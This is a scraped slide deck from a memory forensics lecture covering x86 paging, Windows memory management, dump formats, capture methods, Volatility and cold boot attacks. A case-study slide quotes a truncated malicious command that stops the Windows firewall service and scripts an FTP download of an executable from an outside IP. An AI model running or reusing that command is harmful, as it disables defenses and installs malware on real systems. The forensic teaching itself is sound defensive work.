LinkedIn emplea cookies para mejorar la funcionalidad y el rendimiento de nuestro sitio web, así como para ofrecer publicidad relevante. Si continúas navegando por ese sitio web, aceptas el uso de cookies. Consulta nuestras Condiciones de uso y nuestra Política de privacidad para más información.
LinkedIn emplea cookies para mejorar la funcionalidad y el rendimiento de nuestro sitio web, así como para ofrecer publicidad relevante. Si continúas navegando por ese sitio web, aceptas el uso de cookies. Consulta nuestra Política de privacidad y nuestras Condiciones de uso para más información.
Memory Forensics Presentation from one of my lectures. I have tried to explain the functioning of memory in 32 bit architecture, how paging works, how windows manage its memory pages and how memory forensics job is done. The forensics part focuses on collecting data and analyzing the same
Who am I What has been written in forensics book is “Pull the plug” Things changed post 2005
Check that device drivers are in kernel mode and therefore inside protection. A wrong driver may cause BSoD cause it manipultes memory in kernel Mode
32 pin with can specify upto 4 GB of addresses with 2^32 options
2 level structure. 1024 X 1024 X 4KB page Every Process has :- PDE structure (Every entry has 20 bits to point to Page table number and 12 bits for page protection and other house keeping) PTE Structure (Every entry has 20 bits to point to 4 KB page (total 1024 X4KB pages and 12 bits for house keeping) PFN (Page Frame number is the 4 KB frame in memory) Processor uses 10 bits to find PDE, 10 Bits to find PTE and 12 bits to identify individial bit in 4 KB page
Crash dump: Good for analysis, Dumped with frozen state of windows, Debugging tools available from microsoft Cons: Writes on the hard drive, By default only windows 2003 dumps full memory. (Small 64KB dump, Kernel dump and full dump) Possiblity to force dump only with registry tweak and after the system is restarted post registry tweak full dump available only with the system with upto 2 GB of RAM Content of pagefile are over written as the dump first freezes the system, dumps the RAM in pagefile and then proceeds to Winen: Propreitory format from encase. Can be converted to other formats includng Raw format with FTK imager from access data Vmem: Virtual machine can be suspended and perfect image stored in Vmem. Format similar to raw and same tools used to parse it .Bin: a dump format from windows Hibernation file: Compressed, File format revealed by Mattihieu Suiche fo Sandman (Now part of volatility) Can be used as memory dump. U can use it as additional dump and compare with current dump
Memory is dynamic so try to stop all other activities while performing the capture What do you get….RAM or RAM+Pagefile
Fireport device: Extremely fast due to DMA (Bypass OS) Storm.net.nz project. A software driver that can be used and installed in backtrack and other packages fools the windows os that it is an Ipod. Not very successful Blue Screen of Death reported Misses few parts of the memory Tribble needs to be installed in the machine prior to incident All in all not much of success on hardware front……Still on most part only softwares are used for memory dumping that might in fact rely on DLL already compromised on the system.
Strings and Grep: Raw searches and doesn’t provide the full context in which that string is used. Memeparser win DFRWS (Digital forensics research workshops) 2005 challenge Voaltility
Shri Memory Forensics Boonlia Prince Komal Don’t pull the PlugGmail : email@example.comFacebook:http://www.facebook.com/home.php?#!/profile.php?id=1701055902 or search for my mail id firstname.lastname@example.orgTwitter: http://twitter.com/boonlia
Live/ Dead Memory Forensics• What is Live Memory and what is Dead Memory – RAM – Pagefile – Hibernation file Hard Drive Live Memory Forensics Where is Hibernation file?
Few Basics of RAM• A grid of Capacitors (DRAM)• Bucket with holes• Random Access• Parity Bit for error reporting
A Grid of Capacitors Row Select: Set to high for the related row Column Select: Set to high for related column Read write line set to high for read and low for write Data inflow or outflow depending upon the R/W stateAddress Bus: Carries the Address ofmemory locationData Bus: Carries the data in and outthrough the same wires (Read/Write busor simply Data Bus)
Bucket with whole (DRAM)Capacitors by their very naturegets discharged rapidlyAny read write operation adds tothese capacitors beingdischargedThis calls for regular refreshingwhere in the entire data is readand written backSRAM Uses transistors (2-4)per bit to show on or off stateper bit
Memory Address space Byte Addressable Memory (Reads 8 bits at a time)32 Bit Processor 64 Bit Processor2^32 2^644 GB 17 Billion GB 40 Bit implementation 50 Bit implementation 1024 GB 1024 TB
Memory management at a glance ProcessorMemory Manager Application DMA ?
Need For a Memory ManagerProtect Operating system and Kernel Memory SpacePrevent Application violations (Accessing otherapplications Memory)Allocate memory judiciouslyAllow Multiple applications to co-existsImprove Memory utilization efficiencyExtend the Memory capacity via swappingProvide Application a simpler platform to use memory(Virtual memory Space) You dont have to create twoprograms for 1 GB and 2 GB RAM machinesManaging the shared memory
User mode v/s kernel Mode• Memory protection• Location of both the modes in RAM• /3GB switch in boot.ini• Where the Page directory and Page Table entries are stored• What if User mode needs to access something in Kernel Mode
Kernel Mode Location of Page table and Page Directory User Mode4GB Space 4GB SpaceWithout With PAEPAE
Overview of Virtual Memory Managementon X86 Processor TLB Transaction lookaside buffer
Memory management in windowsWindows on 32 Bit X86 Architecture can accessupto 4 GB MemoryWindows can provide 4GB of memory spaceeach to multiprocesses despite the total memorybeing 4 GB maxThis is done by using the X86 feature calledpagingEvery Memory page is 4KB
The Paging Process in x86 processorImage source:technet.microsoft.com
Few Concepts in Windows Memory Management Process Memory Usage Counters Virtual Size Private Byte Counter Working Set Physical Memory (Say 1GB) Private Bytes Working SetVirtual 2 GBSize Shared Memory
Page lists in Windows (Dont confuse with page table) 1) Zero Page list Pages that carries no data and are ready to be assigned to a process 3) Free Page list Pages not being used by any process and free but still contains data 2) Standby Page list Unmodified Pages that are taken away from a process 4) Modified Page list Modified pages pertaining to a process taken away from that process
Windows Memory Management at a Glance Process Page Working set ve d File Modified a ded ns t a & N ee Page U a 1 M odified DBoot P ages List Sa ve d da ta Hard 2 Drive U nm o dified page s nee Zero d ed Standby Page 3 Me List mo List ry no lon g er n eed ed Free Page n List Exceeding memory use ormemory crunch situation in red font
Memory Management in OS• Memory Manager – Large address space - user programs can reference more memory than physically exists – Protection - the memory for a process is private and cannot be read or modified by another process; also, the memory manager prevents processes from overwriting code and read-only-data. – Memory Mapping - clients can map a file into an area of virtual memory and access the file as memory – Fair Access to Physical Memory - the memory manager ensures that processes all have fair access to the machines memory resources, thus ensuring reasonable system performance – Shared Memory - the memory manager allows processes to share some portion of their memory. For example, executable code is usually shared amongst processes.
What can be found in memory• The running processes• The Running threads• The passwords/ Keys and other information• Live registry hives• Live chats and login informations• Malware presence including rootkits• Open connections to the net / Network• Open Files and their remnants• .• .• In fact any thing that processor works upon
The Process of Memory forensics• Capture the memory• Analyze the memory• Reconstruction of the memory state• Reconstruction of the entire scenario with disk image and memory image in conjunction
Various formats• Raw Dump (Linear format) (.img/.dd)• Windows Crash dump format (.bin) – BSoD (Written after the system is frozen)• Hiberfil.sys format• Commercial tools format – Winen .E01 kind of format – .Vmem (Vmware) – .Bin (Hyper V) – Fastdump Pro (hpak)
Hardware approach• Firewire port device (DMA) • http://www.storm.net.nz/projects/16• PCI Device by Brian Carrier and Joe Grand – Tribble Device
Analysing the memory dump• String search with strings.exe• Grep search with grep command• DFRWS 2005 (Memparser)• 2007: Aaron Walters- Volatility frmework• Several Plugins for Volatiltiy• Pdfbook, Pdgmail, Pdymail, Skypeeks• Memparser• Memoryzer and Audit Viewer
Volatility Framework What is volatility Volatility plugins Using volatility on memory dumps Demo with few options for analysis
Cold Boot Attack• Memory doesn’t gets empty that fast• Even after 30 Seconds to even minutes of system shutdown the memory contains data• This Time can be prolonged if the memory is cooled down. The coolant applied instantly reduce the temperature of -50
Case StudyShell C:windowssystem32cmd.exe /c net1 stopsharedaccess&echo open 220.127.116.11> cmd.txt&echochajian>> cmd.txt&echo 123>> cmd.txt&echobinary>>cmd.txt&echo get seo.exe>>…………..
Gmail : email@example.com Facebook: http://www.facebook.com/home.php?#!/profile.php?id=1701055902 You can reach us at or search for my mail id firstname.lastname@example.org Twitter: http://twitter.com/#!/boonlia email@example.com firstname.lastname@example.org://nullcon.netnullcon Goa 2010